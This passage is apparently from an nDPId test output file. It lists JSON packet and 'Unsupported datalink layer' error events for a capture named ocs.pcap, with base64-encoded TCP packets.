-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":319,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGsQABABoExwKi0ArL40DbC2QBQ64tGkd7qjv+wEBSDAJ0AAAEBCAoANYgURwYKOgEBBQre6pRr3uqkrw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":320,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800718} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":320,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGtQABABoE8wKi0ArL40DbC2QBQ64tGkd7qpK+AEBSxF6cAAAEBCAoANYgcRwYKUg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":321,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800719} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGuQABABoE7wKi0ArL40DbC2QBQ64tGkd7qqhuAEBTeEg4AAAEBCAoANYgcRwYKUg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":322,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800782} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":322,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGvQABABoE6wKi0ArL40DbC2QBQ64tGkd7qr4eAEBULDF4AAAEBCAoANYgiRwYKYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":323,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800784} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":323,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGwQABABoE5wKi0ArL40DbC2QBQ64tGkd7qtPOAEBU4BsUAAAEBCAoANYgiRwYKYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":324,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800786} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":324,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGxQABABoE4wKi0ArL40DbC2QBQ64tGkd7qul+AEBVmASoAAAEBCAoANYgjRwYKYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":325,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800836} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":325,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGyQABABoE3wKi0ArL40DbC2QBQ64tGkd7qv8uAEBWT+30AAAEBCAoANYgoRwYKcQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":326,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800837} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":326,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGzQABABoE2wKi0ArL40DbC2QBQ64tGkd7qxTeAEBXA9eMAAAEBCAoANYgoRwYKcg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":327,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800838} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":327,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG0QABABoE1wKi0ArL40DbC2QBQ64tGkd7qyqOAEBXt8EoAAAEBCAoANYgoRwYKcg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":328,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800882} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":328,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG1QABABoE0wKi0ArL40DbC2QBQ64tGkd7q0A+AEBYb6qAAAAEBCAoANYgsRwYKfg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":329,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800884} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":329,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG2QABABoEzwKi0ArL40DbC2QBQ64tGkd7q1XuAEBZI5QcAAAEBCAoANYgsRwYKfg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":330,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800886} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":330,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG3QABABoEywKi0ArL40DbC2QBQ64tGkd7q2ueAEBZ132wAAAEBCAoANYgtRwYKfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":331,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800910} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":331,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG4QABABoExwKi0ArL40DbC2QBQ64tGkd7q4FOAEBai2cYAAAEBCAoANYgvRwYKig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":332,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800911} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":332,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG5QABABoEwwKi0ArL40DbC2QBQ64tGkd7q5b+AEBbQ1CwAAAEBCAoANYgvRwYKig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":333,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800918} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":333,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG6QABABoEvwKi0ArL40DbC2QBQ64tGkd7q6yuAEBb9zpEAAAEBCAoANYgwRwYKiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":334,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800920} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":334,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG7QABABoEuwKi0ArL40DbC2QBQ64tGkd7q8JeAEBcqyPgAAAEBCAoANYgwRwYKiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":335,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800940} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":335,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG8QABABoEtwKi0ArL40DbC2QBQ64tGkd7q9gOAEBdXw1YAAAEBCAoANYgyRwYKkg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":336,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800942} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":336,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG9QABABoEswKi0ArL40DbC2QBQ64tGkd7q+2+AEBeFvbwAAAEBCAoANYgyRwYKkg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":337,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800994} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":337,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG+QABABoErwKi0ArL40DbC2QBQ64tGkd7rANuAEBeyuB0AAAEBCAoANYg3RwYKkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":338,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800995} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":338,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG\/QABABoEqwKi0ArL40DbC2QBQ64tGkd7rBkeAEBffsoMAAAEBCAoANYg4RwYKkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":339,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801007} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHAQABABoEdwKi0ArL40DbC2QBQ64tGkd7rBkewEBffocEAAAEBCAoANYg5RwYKkwEBBQre6wuz3usRHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":340,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801050} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":340,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHBQABABoEcwKi0ArL40DbC2QBQ64tGkd7rBkewEBffnFEAAAEBCAoANYg9RwYKkwEBBQre6wuz3usWiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":341,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801050} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":341,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHCQABABoEbwKi0ArL40DbC2QBQ64tGkd7rBkewEBffluUAAAEBCAoANYg9RwYKkwEBBQre6wuz3usb9w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":342,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801059} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":342,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHDQABABoEawKi0ArL40DbC2QBQ64tGkd7rBkewEBffkXgAAAEBCAoANYg+RwYKkwEBBQre6wuz3ushYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":343,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801063} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":343,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHEQABABoEZwKi0ArL40DbC2QBQ64tGkd7rBkewEBffjAwAAAEBCAoANYg+RwYKkwEBBQre6wuz3usmzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":344,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801132} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":344,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHFQABABoEYwKi0ArL40DbC2QBQ64tGkd7rBkewEBffhpkAAAEBCAoANYhFRwYKkwEBBQre6wuz3ussOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":345,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801147} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":345,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHGQABABoEjwKi0ArL40DbC2QBQ64tGkd7rLDuAEBgMjC4AAAEBCAoANYhHRwYKuA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":346,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801225} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":346,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHHQABABoEWwKi0ArL40DbC2QBQ64tGkd7rLDuwEBgML34AAAEBCAoANYhORwYKuAEBBQre6zGn3us3Ew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":347,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801286} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":347,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHIQABABoENwKi0ArL40DbC2QBQ64tGkd7rLDvQEBgM0yQAAAEBCAoANYhVRwYKuAEBBRLe6zx\/3utB697rMafe6zcT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":348,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801684} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":348,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHJQABABoEUwKi0ArL40DbC2QBQ64tGkd7rNxOwEBg6DiIAAAEBCAoANYh8RwYLMAEBBQre6zx\/3utB6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":349,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801749} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":349,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHKQABABoETwKi0ArL40DbC2QBQ64tGkd7rNxOwEBg6CK8AAAEBCAoANYiDRwYLMAEBBQre6zx\/3utHVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":350,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801822} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":350,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHLQABABoEewKi0ArL40DbC2QBQ64tGkd7rR1eAEBhnb8gAAAEBCAoANYiKRwYLZA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":351,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801822} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":351,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHMQABABoEdwKi0ArL40DbC2QBQ64tGkd7rTMOAEBiUai8AAAEBCAoANYiKRwYLZA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":352,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801825} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":352,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHNQABABoEcwKi0ArL40DbC2QBQ64tGkd7rUi+AEBjBZJYAAAEBCAoANYiKRwYLZA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":353,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801903} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":353,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHOQABABoEPwKi0ArL40DbC2QBQ64tGkd7rUi+wEBjBu\/wAAAEBCAoANYiSRwYLZAEBBQre61eb3utdBw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":354,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801959} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":354,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHPQABABoEGwKi0ArL40DbC2QBQ64tGkd7rUi\/QEBjBE7wAAAEBCAoANYiYRwYLZAEBBRLe62Jz3utn397rV5ve610H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":355,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802008} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":355,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHQQABABoENwKi0ArL40DbC2QBQ64tGkd7rXQewEBjvmwgAAAEBCAoANYidRwYLlwEBBQre62Jz3utn3w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":356,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802069} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":356,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHRQABABoEMwKi0ArL40DbC2QBQ64tGkd7rXQewEBjvlZYAAAEBCAoANYijRwYLlwEBBQre62Jz3uttSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":357,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802132} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHSQABABoEXwKi0ArL40DbC2QBQ64tGkd7rbUuAEBkcSLEAAAEBCAoANYipRwYLsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":358,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802133} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":358,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHTQABABoEWwKi0ArL40DbC2QBQ64tGkd7rcreAEBlJQxgAAAEBCAoANYipRwYLsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":359,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802191} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":359,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHUQABABoEVwKi0ArL40DbC2QBQ64tGkd7reCOAEBl2PWoAAAEBCAoANYivRwYLwg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":360,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802193} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":360,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHVQABABoEIwKi0ArL40DbC2QBQ64tGkd7reCOwEBl2SPAAAAEBCAoANYivRwYLwgEBBQre632P3uuC+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":361,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802601} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHWQABABoETwKi0ArL40DbC2QBQ64tGkd7rgvuAEBmkMekAAAEBCAoANYjYRwYMFA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":362,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802635} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":362,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy8QABABnyZwKi0AomHgzS0VhQCr\/++QwAAAACgAjkIzeQAAAIEBbQEAggKADWI3AAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":363,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802668} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":363,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHXQABABoEGwKi0ArL40DbC2QBQ64tGkd7rgvuwEBmkHOAAAAEBCAoANYjfRwYMFAEBBQre643T3uuTPw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":364,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802671} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":364,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHYQABABoEFwKi0ArL40DbC2QBQ64tGkd7rgvuwEBmkF3QAAAEBCAoANYjfRwYMFAEBBQre643T3uuYqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":365,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802736} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":365,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHZQABABoEEwKi0ArL40DbC2QBQ64tGkd7riGewEBnREZ0AAAEBCAoANYjmRwYMSwEBBQre643T3uuYqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":366,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802736} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":366,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHaQABABoEPwKi0ArL40DbC2QBQ64tGkd7rmKuAEBn+G5oAAAEBCAoANYjmRwYMSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":367,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802743} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":367,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHbQABABoEOwKi0ArL40DbC2QBQ64tGkd7rnheAEBorFgAAAAEBCAoANYjmRwYMTA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 